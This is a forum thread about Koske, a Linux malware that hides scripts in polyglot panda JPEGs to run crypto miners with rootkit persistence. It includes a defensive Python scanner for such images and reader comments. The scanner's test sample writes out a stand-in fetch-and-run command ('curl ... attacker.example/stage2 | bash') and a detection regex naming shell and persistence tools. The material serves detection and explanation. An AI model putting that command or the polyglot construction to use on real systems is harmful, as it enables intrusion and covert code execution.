AI-Generated Malware in Panda Image Hides Persistent Linux Threat (www.aquasec.com)
from cm0002@lemmy.world to cybersecurity@infosec.pub on 25 Jul 14:07
https://lemmy.world/post/33457177

A sophisticated Linux malware called Koske, discovered in July 2025, hides malicious code within innocent-looking panda bear JPEG images to deploy cryptocurrency miners and establish persistent system access[^1]. Security researchers at AquaSec believe Koske was developed using artificial intelligence, based on its adaptive behaviors and code structure[^2].

The malware exploits misconfigured JupyterLab instances to gain initial access, then downloads two panda images containing separate payloads: a C-based rootkit and a shell script[^3]. Rather than using steganography, Koske employs polyglot files that function as both valid images and executable scripts[^1].

Once executed, the malware:

  • Deploys CPU and GPU-optimized miners for 18 different cryptocurrencies
  • Establishes persistence through cron jobs and systemd services
  • Uses LD_PRELOAD to hide malicious processes and files
  • Manipulates DNS settings and network configurations
  • Automatically switches mining pools if one becomes unavailable[^1]

“Impersonation and psychological warfare will be a big thing in the coming years,” warns Rem Dudas from Palo Alto Networks, noting how AI enables malware to mimic other threat actors’ techniques[^4].

[^1]: BleepingComputer - New Koske Linux malware hides in cute panda images

[^2]: The420 - How Is A “Panda” Becoming a Persistent Threat?

[^3]: Securitricks - AI-Generated Malware in Panda Image Hides Persistent Linux Threat

[^4]: BetaNews - Hackers are using AI and panda images to infect Linux machines

#cybersecurity
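The polyglot trick the post summarizes, as an added example (this is not code from the original post, the Aqua Security report, or the Koske samples): a stdlib-only scanner that walks the JPEG marker structure and reports the two places a script can ride along without breaking the image, bytes appended after the EOI marker and the body of a COM/APPn segment. Those two placements are an assumption about how such polyglots are generally built, not a claim about where Koske keeps its script. The sample image skeleton, the payload and the `attacker.example` host are constructed for the demonstration.

```python
"""Added example: detect JPEG/shell polyglots of the kind the post describes.

Not code from the Aqua Security write-up or from Koske. A JPEG stays a
valid image as long as decoders reach a proper EOI marker (FF D9); they
ignore trailing bytes, and APPn/COM segments may hold arbitrary data.
Those are the two placements this scanner checks (an assumption about
polyglot construction in general). Stdlib only; samples are constructed.
"""
import re
import struct

SOI, EOI = b"\xff\xd8", b"\xff\xd9"
SOS, COM = 0xDA, 0xFE
NO_LENGTH = {0x01, 0xD8, 0xD9} | set(range(0xD0, 0xD8))  # TEM, SOI, EOI, RSTn: no length field
SCRIPT_INDICATORS = re.compile(
    rb"^#!\s*/|/bin/(?:ba|da)?sh\b|\b(?:curl|wget|chmod|nohup|crontab|systemctl)\b|LD_PRELOAD",
    re.M,
)


def parse_segments(data):
    """Walk length-prefixed marker segments up to SOS.
    Returns ([(marker, body_offset, body_length)], scan_start)."""
    if not data.startswith(SOI):
        raise ValueError("not a JPEG: missing SOI")
    pos, segments = 2, []
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker in NO_LENGTH:
            pos += 2
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        body_off, body_len = pos + 4, length - 2
        segments.append((marker, body_off, body_len))
        pos = body_off + body_len
        if marker == SOS:  # entropy-coded data follows; no more length-prefixed segments
            return segments, pos
    raise ValueError("truncated JPEG: no SOS segment")


def find_eoi(data):
    """Offset of EOI, searched from the scan start so an FF D9 pair planted
    inside a COM/APPn body cannot fake the end of the image."""
    _, scan_start = parse_segments(data)
    eoi = data.find(EOI, scan_start)
    if eoi == -1:
        raise ValueError("no EOI marker: truncated or not an image")
    return eoi


def carve_trailer(data):
    """Bytes after EOI: what a loader could pipe to a shell while viewers still show the image."""
    return data[find_eoi(data) + 2:]


def scan_jpeg(data):
    """Return human-readable findings; an empty list means nothing suspicious was seen."""
    findings = []
    segments, _ = parse_segments(data)
    for marker, off, ln in segments:
        if marker == COM or 0xE0 <= marker <= 0xEF:  # COM and APPn carry free-form bytes
            if SCRIPT_INDICATORS.search(data[off:off + ln]):
                findings.append(f"script indicators inside segment FF{marker:02X} at offset {off}")
    trailer = carve_trailer(data)
    if trailer:
        findings.append(f"{len(trailer)} trailing bytes after EOI at offset {len(data) - len(trailer)}")
        if SCRIPT_INDICATORS.search(trailer):
            findings.append("trailing bytes look like a shell script")
    return findings


# --- constructed samples (not real Koske artifacts) ---------------------------
PAYLOAD = b"#!/bin/bash\ncurl -fsSL http://attacker.example/stage2 | bash\n"  # inert stand-in


def build_sample(payload=b"", placement="none"):
    """Minimal JPEG skeleton: SOI, APP0/JFIF, optional COM, SOS, 8 bytes of scan data, EOI.
    placement: 'none', 'trailer' (append after EOI) or 'comment' (inside a COM segment)."""
    jfif = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    app0 = b"\xff\xe0" + struct.pack(">H", len(jfif) + 2) + jfif
    com = b"\xff\xfe" + struct.pack(">H", len(payload) + 2) + payload if placement == "comment" else b""
    sos_body = b"\x01\x01\x00\x00\x3f\x00"
    sos = b"\xff\xda" + struct.pack(">H", len(sos_body) + 2) + sos_body
    img = SOI + app0 + com + sos + b"\x00" * 8 + EOI
    return img + payload if placement == "trailer" else img


if __name__ == "__main__":
    for name, sample in (("clean", build_sample()),
                         ("appended", build_sample(PAYLOAD, "trailer")),
                         ("comment", build_sample(PAYLOAD, "comment"))):
        print(name, scan_jpeg(sample) or ["no findings"])
```

Two caveats for anyone putting this in a pipeline. Trailing bytes after EOI are not proof of malice on their own (some tools append metadata there), which is why the keyword match is reported separately; and keyword matching is only a triage aid, since a payload that is base64- or gzip-encoded before being appended will pass it while still decoding to a working script. The structural part (segment walk, EOI search, trailer carve) is the durable check: `file`, MIME sniffing and any image viewer will happily call such a file a JPEG.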


Diplomjodler3@lemmy.world on 25 Jul 14:54

What the fuck are polyglot files and whoever the fuck thought it was a good idea to invent stuff like that?

baod_rate@programming.dev on 25 Jul 17:53

It’s just a consequence of independent file formats. There’s bound to be overlap in what counts as technically a valid X and also technically a valid Y. It’s pretty much unavoidable. The tricky part is figuring out what fits in that sliver of the venn diagram but is also useful as malware.

tribut@infosec.pub on 25 Jul 21:41

If you haven’t heard of polyglots, you might enjoy every talk by Ange Albertini. Start here (they are all awesome): Funky File Formats

Blaster_M@lemmy.world on 25 Jul 16:28

…and this is where sanitizing inputs becomes even more important…

baod_rate@programming.dev on 25 Jul 17:53

Researchers from AquaSec have noted its ability to automatically switch to backup mining pools if a primary one becomes unavailable, ensuring continuous operation. This level of sophistication has led security experts to believe that large language models or other automation frameworks may have played a role in its development.

Is it just me or is this not a very convincing rationale.

AmbitiousProcess@piefed.social on 25 Jul 19:21

Not whatsoever.

Practically any mining software would allow you to change a pool whenever you felt like it, and making a script that just goes "oh, x.x.x.x isn't responding anymore, I should point my hashrate to y.y.y.y now" is... not hard, to say the least.

Goten@piefed.social on 25 Jul 19:04

damn Chinese

Cyber@feddit.uk on 26 Jul 06:48

“Impersonation and psychological warfare will be a big thing in the coming years,” warns Rem Dudas from Palo Alto Networks, noting how AI enables malware to mimic other threat actors’ techniques

Might be <%your country%>?

AquaSec identified Serbia-based IP addresses used in the attacks, Serbian phrases in the scripts, and Slovak language in the GitHub repository hosting the miners, but it could make no confident attribution.